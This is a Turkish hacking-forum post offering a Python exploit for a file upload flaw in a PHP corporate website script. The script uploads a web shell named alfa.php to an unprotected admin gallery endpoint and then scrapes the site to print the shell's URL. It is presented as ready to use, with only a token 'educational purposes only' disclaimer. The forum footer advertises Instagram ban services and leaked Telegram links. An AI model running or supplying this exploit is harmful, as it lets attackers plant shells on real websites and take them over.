Exploit Crealite Kurumsal Firma Scripti File Upload Exploit

K

King

Katılım
25 Ara 2018
Tepki puanı
826
Rating - 0%
Her veri alışverişinde güvenli bir şekilde pdo kullanmış olsalar dahi bir dosyada unuttukları kontrol önlemi yüzünden sisteme shell yükleyebilmekteyiz.

İlgili script: https://www.phpscripttr.com/yeni-kurumsal-firma-scripti-indir-2020/

Exploit:
Python: 
import requests
from bs4 import BeautifulSoup

url = "http://localhost"   # Burayı domain ile değiştir.
shell = "alfa.php"                      # Buradan shell seç - Exploit ile Shell aynı dizinde olmalıdır.

dosya = {"file": open(shell, "rb")}
yukle = requests.post(url+"/admin/inc/galeri/logo.php", files=dosya)
goster = requests.get(url)
kaynak = BeautifulSoup(goster.content,"lxml")
resimler = kaynak.find_all("img")
for i in resimler:
    if (i["src"].split(".")[1] == shell.split(".")[1]):
        print(url+"/"+i["src"])

Not: Sadece eğitim amaçlıdır. Yasadışı işlemlerden sorumluluk kabul etmemekteyim.
 
Yanıt için giriş yapmanız veya üye olmanız gerekir.
131,501Konular
3,268,781Mesajlar
315,299Kullanıcılar
ırmak.ozdmnSon Üye

About Us & Legal Notice

Legal Notice: The website spyhackerz.org is classified as a “Hosting Provider” (“Yer Sağlayıcı”) within the meaning of Article 2, paragraph 1, subparagraph (m) and Article 5 of Law No. 5651. All content is created entirely by users without any prior approval, similar to platforms such as X, Instagram, Facebook, etc. As a hosting provider, spyhackerz.org is not obliged to monitor, control, or investigate user-generated content or any potentially unlawful sharing. There are no “attack teams” on spyhackerz.org, and no harmful activities are carried out against websites located in Türkiye. SPYHACKERZ is not responsible for any individual hacking-related forum activities carried out by its members. If any hacking activity is conducted against your websites using the name spyhackerz.org, all responsibility lies solely with the member who performs the attack.
Hızlı Erişim
+90 SMS Onay Aged instagram Aged instagram 2 instagram ban servisi Telegram ifşa Linkleri Canlı maç izleme linkleri telegram Sızma Testi Sosyal Medya Kripto Duyurular
Üst Alt